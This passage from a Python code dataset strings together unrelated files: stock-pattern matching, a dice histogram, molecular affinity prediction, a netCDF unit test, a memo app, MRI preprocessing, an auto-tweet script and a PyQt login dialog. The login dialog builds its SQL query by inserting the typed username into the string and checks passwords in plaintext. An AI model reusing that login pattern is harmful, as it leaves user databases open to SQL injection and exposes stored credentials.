date_p:\n pass\n else:\n cnt +=1\n # Get highest and lowest of src\n src_h = k.iloc[i, 3]\n src_l = k.iloc[i, 3]\n for j in range(0, cycle):\n if k.iloc[i + j, 3] > src_h:\n src_h = k.iloc[i + j, 3]\n if k.iloc[i + j, 3] < src_l:\n src_l = k.iloc[i + j, 3]\n\n # Get highest and lowest of test\n tet_h = test_set.iloc[0, 3]\n tet_l = test_set.iloc[0, 3]\n for j in range(0, cycle):\n if k.iloc[ j, 3] > tet_h:\n tet_h = test_set.iloc[0 + j, 3]\n if k.iloc[ j, 3] < tet_l:\n tet_l = test_set.iloc[0 + j, 3]\n\n # Calculate derivative\n delta = (src_h - src_l) - (tet_h - tet_l)\n single_ret_list = []\n for t in range(0, abs(int(delta)) + 1):\n der = 0\n for j in range(0, cycle):\n if delta > 0:\n unit1 = (k.iloc[i + j, 2] - src_l) - (test_set.iloc[0 + j, 2] - tet_l + t)\n unit2 = (k.iloc[i + j, 3] - src_l) - (test_set.iloc[0 + j, 3] - tet_l + t)\n unit3 = (k.iloc[i + j, 4] - src_l) - (test_set.iloc[0 + j, 4] - tet_l + t)\n unit4 = (k.iloc[i + j, 5] - src_l) - (test_set.iloc[0 + j, 5] - tet_l + t)\n else:\n unit1 = (k.iloc[i + j, 2] - src_l + t) - (test_set.iloc[0 + j, 2] - tet_l)\n unit2 = (k.iloc[i + j, 3] - src_l + t) - (test_set.iloc[0 + j, 3] - tet_l)\n unit3 = (k.iloc[i + j, 4] - src_l + t) - (test_set.iloc[0 + j, 4] - tet_l)\n unit4 = (k.iloc[i + j, 5] - src_l + t) - (test_set.iloc[0 + j, 5] - tet_l)\n der += (unit1 * unit1 + unit2 * unit2 + unit3 * unit3 + unit4 * unit4)\n single_ret_list.append(der)\n # find smallest der\n\n min_val = single_ret_list[0]\n for val in single_ret_list:\n if val < min_val:\n min_val = val\n\n # Done\n test_ret[0].append(date_c)\n test_ret[1].append(min_val)\n\n\n # Print result\n min_day = test_ret[1][0]\n min_pos = 0\n for i in range(0, cnt):\n if test_ret[1][i] < min_day:\n min_day = test_ret[1][i]\n min_pos = i\n print(test_ret[0][min_pos])\n print(test_ret[1][min_pos])\n for i in range(1, len(k)):\n date_time_p = k.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = k.iloc[i, 1]\n date_c = date_time_c.split(\" 
\")[0]\n if date_c == date_p:\n pass\n else:\n if date_c == test_ret[0][min_pos]:\n for n in range(0, 5):\n d1 = k.iloc[i + cycle - 1 + n, 2] - k.iloc[i + cycle - 1 + n, 2]\n d2 = k.iloc[i + cycle - 1 + n, 3] - k.iloc[i + cycle - 1 + n, 2]\n d3 = k.iloc[i + cycle - 1 + n, 4] - k.iloc[i + cycle - 1 + n, 2]\n d4 = k.iloc[i + cycle - 1 + n, 5] - k.iloc[i + cycle - 1 + n, 2]\n print(str(d1) + \" \" + str(d2) +\" \"+ str(d3) + \" \"+str(d4))\n print(\" \")\n print(test_day2)\n for n in range(0, 5):\n d1 = test_set.iloc[cycle - 1 + n, 2] - test_set.iloc[cycle - 1 + n, 2]\n d2 = test_set.iloc[cycle - 1 + n, 3] - test_set.iloc[cycle - 1 + n, 2]\n d3 = test_set.iloc[cycle - 1 + n, 4] - test_set.iloc[cycle - 1 + n, 2]\n d4 = test_set.iloc[cycle - 1 + n, 5] - test_set.iloc[cycle - 1 + n, 2]\n print(str(d1) + \" \" + str(d2) + \" \" + str(d3) + \" \" + str(d4))\n\n\n\n\n exit(0)\n b.get_acc_info()\n\n\n ret, cn_list = b.find_warrent()\n if ret != -1:\n print(cn_list)\n\n\n start = '2005-01-04'\n end = '2016-04-29'\n code = 'SZ.000639'\n ret, k = b.get_history_k(code, start, end)\n if ret != -1:\n print(\"ok\")\n k.to_csv(\"C:\\\\15M_history.csv\", index=False)\n print(\"Saved\")\n #print(k)\n\n #fitting_shape_cup(k)\n\n","sub_path":"samples/cn_list.py","file_name":"cn_list.py","file_ext":"py","file_size_in_byte":21696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368505833","text":"\nimport pygal\n\nfrom die import Die\n\n# # 创建一个 D6\n# die_1 = Die()\n# die_2 = Die()\n\n# # 掷几次骰子,并将结果存储在一个列表中\n# results = []\n# for roll_num in range(1000):\n# \tresult = die_1.roll() + die_2.roll()\n# \tresults.append(result)\n\n# # 分析结果\n# frequencies = []\n# max_result = die_1.num_sides + die_2.num_sides\n# for value in range(2, max_result+1):\n# \tfreuency = results.count(value)\n# \tfrequencies.append(freuency)\n\n# # print(frequencies)\n\n# # 对结果进行可视化\n# hist = pygal.Bar()\n\n# hist.title = \"Results of rolling one D6 1000 
times.\"\n# hist.x_labels = ['2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']\n# hist.x_title = 'Result'\n# hist.y_title = \"Frequency of Result\"\n\n# hist.add('D6 + D6', frequencies)\n# hist.render_to_file('die_visual_2.svg')\n\n\ndie_1 = Die()\ndie_2 = Die(10)\n\nresults = []\nfor roll_num in range(50000):\n\tresult = die_1.roll() + die_2.roll()\n\tresults.append(result)\n\nfrequencies = []\nmax_result = die_1.num_sides + die_2.num_sides\nfor value in range(2, max_result + 1):\n\tfreuency = results.count(value)\n\tfrequencies.append(freuency)\n\nhist = pygal.Bar()\n\nhist.title = \"Results of rolling a D6 and a D10 5,000 times.\"\nhist.x_labels = list(range(2, max_result + 1))\nhist.x_title = \"Result\"\nhist.y_title = 'Frequency of Result'\n\nhist.add('D6 + D10', frequencies)\nhist.render_to_file('dice_visual_2.svg')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python(第二次)/pygal/die_visual.py","file_name":"die_visual.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"12470793","text":"# Scores molecular complexes by running them through Pafnucy\n\nimport numpy as np\nimport pandas as pd\nimport h5py\n\nimport tensorflow as tf\nfrom tfbio.data import Featurizer, make_grid\n\nimport os\n\n\ndef input_file(path):\n \"\"\"Check if input file exists.\"\"\"\n\n path = os.path.abspath(path)\n if not os.path.exists(path):\n raise IOError('File %s does not exist.' % path)\n return path\n\n\ndef network_prefix(path):\n \"\"\"Check if all file required to restore the network exists.\"\"\"\n\n from glob import glob\n dir_path, file_name = os.path.split(path)\n path = os.path.join(os.path.abspath(dir_path), file_name)\n\n for extension in ['index', 'meta', 'data*']:\n file_name = '%s.%s' % (path, extension)\n\n # use glob instead of os because we need to expand the wildcard\n if len(glob(file_name)) == 0:\n raise IOError('File %s does not exist.' 
% file_name)\n\n return path\n\n\ndef batch_size(value):\n \"\"\"Check if batch size is a non-negative integer\"\"\"\n\n value = int(value)\n if value < 0:\n raise ValueError('Batch size must be positive, %s given' % value)\n return value\n\n\ndef output_file(path):\n \"\"\"Check if output file can be created.\"\"\"\n\n path = os.path.abspath(path)\n dirname = os.path.dirname(path)\n\n if not os.access(dirname, os.W_OK):\n raise IOError('File %s cannot be created (check your permissions).'\n % path)\n return path\n\n\ndef string_bool(s):\n s = s.lower()\n if s in ['true', 't', '1', 'yes', 'y']:\n return True\n elif s in ['false', 'f', '0', 'no', 'n']:\n return False\n else:\n raise IOError('%s cannot be interpreted as a boolean' % s)\n\n\nimport argparse\nparser = argparse.ArgumentParser(\n description='Predict affinity with the network',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n epilog='''This script reads the structures of complexes from HDF file and\n predicts binding affinity for each comples. The input can be prepared with\n prepare.py script. If you want to prepare the data and run the model manualy\n use functions defined in utils module.\n '''\n)\n\nparser.add_argument('--input', '-i', required=True, type=input_file,\n help='HDF file with prepared structures')\nparser.add_argument('--network', '-n', type=network_prefix,\n default='results/batch5-2017-06-05T07:58:47-best',\n help='prefix for the files with the network'\n 'Be default we use network trained on PDBbind v. 2016')\nparser.add_argument('--grid_spacing', '-g', default=1.0, type=float,\n help='distance between grid points used during training')\nparser.add_argument('--max_dist', '-d', default=10.0, type=float,\n help='max distance from complex center used during training')\nparser.add_argument('--batch', '-b', type=batch_size,\n default=20,\n help='batch size. 
If set to 0, predict for all complexes at once.')\nparser.add_argument('--charge_scaler', type=float, default=0.425896,\n help='scaling factor for the charge'\n ' (use the same factor when preparing data for'\n ' training and and for predictions)')\nparser.add_argument('--output', '-o', type=output_file,\n default='./predictions.csv',\n help='name for the CSV file with the predictions')\nparser.add_argument('--verbose', '-v', type=string_bool,\n default=True,\n help='whether to print messages')\n\n\nargs = parser.parse_args()\n\n# TODO: avarage prediction for different rotations (optional)\n\nfeaturizer = Featurizer()\n\ncharge_column = featurizer.FEATURE_NAMES.index('partialcharge')\n\ncoords = []\nfeatures = []\nnames = []\n\nwith h5py.File(args.input, 'r') as f:\n for name in f:\n names.append(name)\n dataset = f[name]\n coords.append(dataset[:, :3])\n features.append(dataset[:, 3:])\n\n\nif args.verbose:\n print('loaded %s complexes\\n' % len(coords))\n\n\ndef __get_batch():\n\n batch_grid = []\n\n if args.verbose:\n if args.batch == 0:\n print('predict for all complexes at once\\n')\n else:\n print('%s samples per batch\\n' % args.batch)\n\n for crd, f in zip(coords, features):\n batch_grid.append(make_grid(crd, f, max_dist=args.max_dist,\n grid_resolution=args.grid_spacing))\n if len(batch_grid) == args.batch:\n # if batch is not specified it will never happen\n batch_grid = np.vstack(batch_grid)\n batch_grid[..., charge_column] /= args.charge_scaler\n yield batch_grid\n batch_grid = []\n\n if len(batch_grid) > 0:\n batch_grid = np.vstack(batch_grid)\n batch_grid[..., charge_column] /= args.charge_scaler\n yield batch_grid\n\n\nsaver = tf.train.import_meta_graph('%s.meta' % args.network,\n clear_devices=True)\n\n\npredict = tf.get_collection('output')[0]\ninp = tf.get_collection('input')[0]\nkp = tf.get_collection('kp')[0]\n\nif args.verbose:\n print('restored network from %s\\n' % args.network)\n\nwith tf.Session() as session:\n saver.restore(session, 
args.network)\n predictions = []\n batch_generator = __get_batch()\n for grid in batch_generator:\n # TODO: remove kp in next release\n # it's here for backward compatibility\n predictions.append(session.run(predict, feed_dict={inp: grid, kp: 1.0}))\n\nresults = pd.DataFrame({'name': names,\n 'prediction': np.vstack(predictions).flatten()})\nresults.to_csv(args.output, index=False)\nif args.verbose:\n print('results saved to %s' % args.output)\n","sub_path":"Retraining Scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309213172","text":"import datetime\nimport os\nimport tempfile\nimport unittest\n\nimport numpy\n\nimport cf\n\n\nclass ExternalVariableTest(unittest.TestCase):\n def setUp(self):\n self.parent_file = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'parent.nc')\n self.external_file = os.path.join(os.path.dirname(\n os.path.abspath(__file__)), 'external.nc')\n self.combined_file = os.path.join(os.path.dirname(\n os.path.abspath(__file__)), 'combined.nc')\n self.external_missing_file = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'external_missing.nc')\n\n self.test_only = []\n\n (fd, self.tempfilename) = tempfile.mkstemp(\n suffix='.nc', prefix='cf_', dir='.')\n os.close(fd)\n (fd, self.tempfilename_parent) = tempfile.mkstemp(\n suffix='.nc', prefix='cf_parent_', dir='.')\n os.close(fd)\n (fd, self.tempfilename_external) = tempfile.mkstemp(\n suffix='.nc', prefix='cf_external_', dir='.')\n os.close(fd)\n\n def tearDown(self):\n os.remove(self.tempfilename)\n os.remove(self.tempfilename_parent)\n os.remove(self.tempfilename_external)\n\n def test_EXTERNAL_READ(self):\n if self.test_only and inspect.stack()[0][3] not in self.test_only:\n return\n\n # Read the parent file on its own, without the external file\n f = cf.read(self.parent_file, verbose=0)\n\n for i in f:\n _ = repr(i)\n _ = 
str(i)\n _ = i.dump(display=False)\n\n self.assertEqual(len(f), 1)\n f = f[0]\n\n cell_measure = f.constructs.filter_by_identity('measure:area').value()\n\n self.assertTrue(cell_measure.nc_get_external())\n self.assertEqual(cell_measure.nc_get_variable(), 'areacella')\n self.assertEqual(cell_measure.properties(), {})\n self.assertFalse(cell_measure.has_data())\n\n # External file contains only the cell measure variable\n f = cf.read(self.parent_file, external=[self.external_file],\n verbose=0)\n\n c = cf.read(self.combined_file, verbose=0)\n\n for i in c + f:\n _ = repr(i)\n _ = str(i)\n _ = i.dump(display=False)\n\n cell_measure = f[0].constructs.filter_by_identity(\n 'measure:area').value()\n\n self.assertEqual(len(f), 1)\n self.assertEqual(len(c), 1)\n\n for i in range(len(f)):\n self.assertTrue(c[i].equals(f[i], verbose=2))\n\n # External file contains other variables\n f = cf.read(self.parent_file, external=self.combined_file,\n verbose=0)\n\n for i in f:\n _ = repr(i)\n _ = str(i)\n _ = i.dump(display=False)\n\n self.assertEqual(len(f), 1)\n self.assertEqual(len(c), 1)\n\n for i in range(len(f)):\n self.assertTrue(c[i].equals(f[i], verbose=2))\n\n # Two external files\n f = cf.read(\n self.parent_file,\n external=[self.external_file, self.external_missing_file],\n verbose=0\n )\n\n for i in f:\n _ = repr(i)\n _ = str(i)\n _ = i.dump(display=False)\n\n self.assertEqual(len(f), 1)\n self.assertEqual(len(c), 1)\n\n for i in range(len(f)):\n self.assertTrue(c[i].equals(f[i], verbose=2))\n\n def test_EXTERNAL_WRITE(self):\n if self.test_only and inspect.stack()[0][3] not in self.test_only:\n return\n\n parent = cf.read(self.parent_file)\n combined = cf.read(self.combined_file)\n\n # External file contains only the cell measure variable\n f = cf.read(self.parent_file, external=self.external_file)\n\n cf.write(f, self.tempfilename)\n g = cf.read(self.tempfilename)\n\n self.assertEqual(len(g), len(combined))\n\n for i in range(len(g)):\n 
self.assertTrue(combined[i].equals(g[i], verbose=2))\n\n cell_measure = g[0].constructs('measure:area').value()\n\n self.assertFalse(cell_measure.nc_get_external())\n cell_measure.nc_set_external(True)\n self.assertTrue(cell_measure.nc_get_external())\n self.assertTrue(cell_measure.properties())\n self.assertTrue(cell_measure.has_data())\n\n self.assertTrue(\n g[0].constructs.filter_by_identity(\n 'measure:area').value().nc_get_external()\n )\n\n cf.write(g, self.tempfilename_parent,\n external=self.tempfilename_external,\n verbose=0)\n\n h = cf.read(self.tempfilename_parent, verbose=0)\n\n self.assertEqual(len(h), len(parent))\n\n for i in range(len(h)):\n self.assertTrue(parent[i].equals(h[i], verbose=2))\n\n h = cf.read(self.tempfilename_external)\n external = cf.read(self.external_file)\n\n self.assertEqual(len(h), len(external))\n\n for i in range(len(h)):\n self.assertTrue(external[i].equals(h[i], verbose=2))\n\n# --- End: class\n\n\nif __name__ == '__main__':\n print('Run date:', datetime.datetime.now())\n print(cf.environment())\n print()\n unittest.main(verbosity=2)\n","sub_path":"cf/test/test_external.py","file_name":"test_external.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372260384","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# main.py\n# invoke other file of py to realize functions\n# author: pengtao\n\nimport os\nimport sys\nimport logging\nBASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH)\nfrom core import login, MemoAdmin, config, mylog, memo_out, send_email\n\n\n# logging.disable(logging.CRITICAL)\n# 禁止所有日志输出\ndef main():\n log = mylog.my_logger(BASE_PATH + '\\\\log\\\\' + 'execute\\\n _log.log', logging.DEBUG, 'pengtaolog')\n # 打开日志\n data_file_path = login.register(log) # 用户登录,返回该用户数据文件名\n log.info('用户登录,返回该用户数据文件名')\n memo_o = memo_out.MemoOut(data_file_path) # 生成Memo_Out对象\n 
log.info('利用数据文件名进行操作')\n\n if len(sys.argv) >= 2:\n if sys.argv[1] in ['-se', '--send_email']: # 系统命令行参数调用发邮件\n log.debug('系统命令行参数调用发邮件')\n while True:\n try:\n ask = input('输出整年(year),整月(month)')\n if ask == 'year':\n data_path, choose = memo_o.out_all_a_year()\n log.debug('获得json文件的路径,和用户年份选择')\n if ask == 'month':\n data_path, choose = memo_o.out_all_a_month()\n log.debug('获得json文件的路径,和用户月份选择')\n break\n except Exception:\n print('输入错误')\n send_email.send_email_attach(f'这是{choose}的数据,请查看!', data_path, 'lv\\\n an1033@live.cn') # 发送给特定人物的邮件\n\n if len(sys.argv) >= 2:\n if sys.argv[1] in ['-rj', '--return_json']: # 系统命令行参数调用返回json数据\n log.debug('系统命令行参数调用返回json数据')\n print(memo_o.get_all_a_month()) # 打印按月份返回的json数据\n\n MemoAdmin.memoadmin(data_file_path) # 利用数据文件名进行操作\n\n config.config(data_file_path) # 用户配置文件生成\n log.info('用户配置文件生成')\n\n\nif __name__ == '__main__':\n main()","sub_path":"0302api-pengtao/51memo/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403585604","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom skimage.filters import gaussian, median, laplace\nfrom skimage.morphology import disk\nfrom skimage.feature import canny, hog\n#from skimage.measure import find_contours\nfrom skimage.exposure import adjust_gamma\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nfrom skimage.transform import hough_line, hough_line_peaks\nfrom data import trainT1_data, trainT2_data\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(trainT1_data.shape)\nprint(trainT2_data.shape)\n\ndef kmeans(im,n):\n data = im.ravel()[:,np.newaxis]\n\n model = KMeans(n_clusters = n)\n model.fit(data)\n label_pred = model.labels_\n label_pred = label_pred.reshape(512,512)\n return label_pred\ndef gmm(im,n):\n data = im.ravel()[:,np.newaxis]\n\n model = GaussianMixture(n_components = n)\n model.fit(data)\n 
label_pred = model.predict(data)\n label_pred = label_pred.reshape(512,512)\n return label_pred\n\n# data pre-processing\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nnb = np.random.randint(trainT1_data.shape[0])\nim = trainT1_data[nb]\n\ndef find_roi1(im, precision):\n # preprocess 1: do the binary separation to get the mask\n med = median(im,disk(5))\n im_gmm_med = gmm(med,n=2)\n if np.mean(im_gmm_med) > 0.5:\n im_gmm_med = np.where(im_gmm_med==0,1,0)\n mask = im_gmm_med*im\n \n # preprocess 2: do hog to detect and separate the spine\n fd, hog_im = hog(mask, orientations=4, pixels_per_cell=(512, precision),\n cells_per_block=(2, 2), visualize=True)\n hog_im = adjust_gamma(hog_im,gamma=0.5)\n \n p = [(2*i+1) for i in range(512//precision)]\n centres = np.array([c*0.5*precision for c in p]).astype(int)\n centres_max = [np.max(hog_im[512//2,centres[i]]) for i in range(512//precision)]\n th = np.mean(centres_max)\n centres_use = [centres[i] for i in range(len(centres_max)) if centres_max[i]>th]\n \n # detect ananomy: there may be some noise in the left of the picture that is noted in the centres_use\n for centre in centres_use:\n if centre + precision not in centres_use and centre - precision not in centres_use:\n centres_use.remove(centre)\n \n # detect ananomy: there may be some noise just in the left of the spine that affected the mask\n while np.max(centres_use) - np.min(centres_use) > 128:\n centres_use.pop(0)\n \n # obtain ROI\n centre_r, centre_l = np.max(centres_use), np.min(centres_use)\n centre_m = int((centre_r + centre_l)/2)\n im_copy = np.zeros_like(im)\n # make some tolerance\n centre_l, centre_m = centre_l - int(0.1 * (centre_m - centre_l)), centre_m + int(0.1 * (centre_m - centre_l))\n im_copy[:,centre_l:centre_m] = mask[:,centre_l:centre_m]\n\n return im_copy\nprecision = 8 # nb of pixcels per cell horizontally, the lower the more precise\nim_roi1 = find_roi1(im, precision)\n\ndef find_roi2(im, precision):\n fd, hog_im = 
hog(im, orientations=8, pixels_per_cell=(precision, precision),\n cells_per_block=(4, 4), visualize=True)\n return hog_im\nprecision = 2 # nb of pixcels per cell horizontally, the lower the more precise\nim_roi2 = find_roi2(im_roi1, precision)\n\nplt.figure(figsize=(10,5))\nplt.subplot(121)\nplt.imshow(im_roi1,cmap='gray')\nplt.subplot(122)\nplt.imshow(im_roi2,cmap='gray')\nplt.show()\n\n# TODO 试验记录\n# TODO 从去噪声 模糊化效果来看,median保留了更多的特征,比gaussian要好\n\n# plot some train data and preprocess results\nif __name__ == '__main__':\n data_examples = 5\n type_examples = 5\n tested_angles = np.linspace(-np.pi / 2, np.pi / 2, 60)\n plt.figure(figsize=(8*type_examples,8*data_examples))\n\n counter = 1\n for i in range(data_examples):\n nb = np.random.randint(trainT1_data.shape[0])\n im = trainT1_data[nb]\n\n # prepocess\n # 1\n #smo = gaussian(im,sigma=5)\n med = median(im,disk(5))\n #lap = laplace(med,ksize=3)\n \n # 2\n im_gmm_med = gmm(med,n=2)\n if np.mean(im_gmm_med) > 0.5:\n im_gmm_med = np.where(im_gmm_med==0,1,0)\n \n # 3\n im_roi = im_gmm_med*im\n \n # 4\n edg = canny(im_roi, sigma=10)\n h, theta, d = hough_line(edg, theta=tested_angles)\n \n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(im,cmap='gray')\n origin = np.array((0, edg.shape[1]))\n for _, angle, dist in zip(*hough_line_peaks(h, theta, d)):\n if abs(angle) < np.pi/18 and 100 < abs(dist) < 500:\n y0, y1 = (dist - origin * np.cos(angle)) / np.sin(angle)\n plt.plot(origin, (y0, y1), '-r')\n plt.xlim((0, im.shape[1]))\n plt.ylim((im.shape[0], 0))\n plt.title('No.' 
+ str(nb), fontsize=20)\n plt.axis('off')\n counter += 1\n\n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(med,cmap='gray')\n plt.axis('off')\n counter += 1\n\n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(im_gmm_med,cmap='gray')\n plt.axis('off')\n counter += 1\n \n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(im_roi,cmap='gray')\n plt.axis('off')\n counter += 1\n \n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(edg,cmap='gray')\n plt.axis('off')\n counter += 1\n\n plt.show()\n\n\n\n\n\n\n\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"292486369","text":"#Given a list of numbers, find the largest number\n# \n\nnumbers = [0,6,2,5,6,9]\n\ndef get_max(list_input):\n max_value = list_input[0]\n for i in list_input:\n if i > max_value:\n max_value = i\n return max_value\nprint(get_max(numbers))\n\n# max = numbers[0]\n\n# for i in numbers:\n# if i > max:\n# max = i\n\n# print(max)\n","sub_path":"highest_number.py","file_name":"highest_number.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"321722394","text":"import numpy as np\nimport tweepy\n\n#variables for accessing twitter API\nconsumer_key='XXXXXXXXXXXXXXXXXXXXXXXXXX'\nconsumer_secret_key='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\naccess_token='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\naccess_token_secret='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\n\nauth=tweepy.OAuthHandler(consumer_key,consumer_secret_key)\nauth.set_access_token(access_token,access_token_secret)\napi=tweepy.API(auth)\n\n\ntweet_text=\"My first Auto Tweet for #CodeChella\"\nimage_path =\"static/uploads/Style_udnie_Mark_Zoo_Mowaa.jpg\"\n\n#Generate text tweet with media (image)\nstatus = api.update_with_media(image_path, tweet_text)\n# 
api.update_status(status=tweet_text)\n\n\n\n","sub_path":"tweet_to_twitter.py","file_name":"tweet_to_twitter.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"618734648","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nimport sys\r\nfrom setmodule.setting import set_mod\r\nfrom warnning import Ui_warn\r\nfrom mysqlload import *\r\nimport qtawesome\r\n\r\n\r\nclass Ui_logoin(QWidget):\r\n Signal_parp = pyqtSignal(str)\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.retranslateUi(self)\r\n\r\n\r\n @pyqtSlot()\r\n def on_yes_clicked(self):\r\n recusername = self.lineEdit.text()\r\n recpassword = self.lineEdit_2.text()\r\n if (recusername == '') or (recpassword == ''):\r\n self.warn = Ui_warn('用户名和密码不得为空!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n else:\r\n try:\r\n face,cur = connectsql()\r\n sql = \"select password from users where user='%s'\"%(recusername)\r\n cur.execute(sql)\r\n sqlpassword = cur.fetchone()\r\n closesql(face, cur)\r\n if sqlpassword==None:\r\n self.warn = Ui_warn('用户不存在!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n elif sqlpassword[0]==recpassword:\r\n data_str = recusername\r\n self.Signal_parp.emit(data_str)\r\n self.close()\r\n else:\r\n self.warn = Ui_warn('密码错误!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n except:\r\n self.warn = Ui_warn('数据连接失败,请设置数据库!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n self.lineEdit.clear()\r\n self.lineEdit_2.clear()\r\n\r\n\r\n def keyPressEvent(self, e):\r\n if e.key() == Qt.Key_Escape:\r\n self.close()\r\n\r\n def setupUi(self, logoin):\r\n logoin.setObjectName(\"logoin\")\r\n logoin.resize(320, 214)\r\n self.gridLayout = 
QtWidgets.QGridLayout(logoin)\r\n\r\n spin_icon = qtawesome.icon('fa5s.angle-double-right', color='black')\r\n logoin.setWindowIcon(spin_icon)\r\n\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout()\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.title = QtWidgets.QLabel(logoin)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.title.sizePolicy().hasHeightForWidth())\r\n self.title.setSizePolicy(sizePolicy)\r\n self.title.setMinimumSize(QtCore.QSize(300, 60))\r\n self.title.setMaximumSize(QtCore.QSize(300, 70))\r\n self.title.setFocusPolicy(QtCore.Qt.NoFocus)\r\n self.title.setStyleSheet(\"background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:none;border-width:1px;border-radius:0px;font:29px \\\"方正小标宋简体\\\";font-style:normal;font-weight: normal;text-decoration:blink;\")\r\n self.title.setObjectName(\"title\")\r\n self.verticalLayout.addWidget(self.title)\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.count = QtWidgets.QLabel(logoin)\r\n self.count.setMinimumSize(QtCore.QSize(60, 30))\r\n self.count.setStyleSheet(\"background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:none;border-width:1px;border-radius:0px;font:20px \\\"黑体\\\";font-style:normal;font-weight: normal;text-decoration:blink;\")\r\n self.count.setObjectName(\"count\")\r\n self.horizontalLayout_2.addWidget(self.count)\r\n self.lineEdit = QtWidgets.QLineEdit(logoin)\r\n self.lineEdit.setStyleSheet(\"background-color:rgba(0,0,0,11);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:solid;border-width:1px;border-radius:7px;font:18px \\\"Times New Roman\\\";\")\r\n 
self.lineEdit.setObjectName(\"lineEdit\")\r\n self.horizontalLayout_2.addWidget(self.lineEdit)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n self.horizontalLayout = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.words = QtWidgets.QLabel(logoin)\r\n self.words.setMinimumSize(QtCore.QSize(60, 50))\r\n self.words.setStyleSheet(\"background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:none;border-width:1px;border-radius:0px;font:20px \\\"黑体\\\";font-style:normal;font-weight: normal;text-decoration:blink;\")\r\n self.words.setObjectName(\"words\")\r\n self.horizontalLayout.addWidget(self.words)\r\n self.lineEdit_2 = QtWidgets.QLineEdit(logoin)\r\n self.lineEdit_2.setStyleSheet(\"background-color:rgba(0,0,0,11);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:solid;border-width:1px;border-radius:7px;font:18px \\\"Times New Roman\\\";\")\r\n self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)\r\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\r\n self.horizontalLayout.addWidget(self.lineEdit_2)\r\n self.verticalLayout.addLayout(self.horizontalLayout)\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.yes = QtWidgets.QPushButton(logoin)\r\n self.yes.setMinimumSize(QtCore.QSize(50, 30))\r\n self.yes.setMaximumSize(QtCore.QSize(80, 30))\r\n self.yes.setStyleSheet(\"\")\r\n self.yes.setObjectName(\"yes\")\r\n self.horizontalLayout_3.addWidget(self.yes)\r\n self.quit = QtWidgets.QPushButton(logoin)\r\n self.quit.setMinimumSize(QtCore.QSize(80, 30))\r\n self.quit.setMaximumSize(QtCore.QSize(80, 30))\r\n self.quit.setStyleSheet(\"\")\r\n 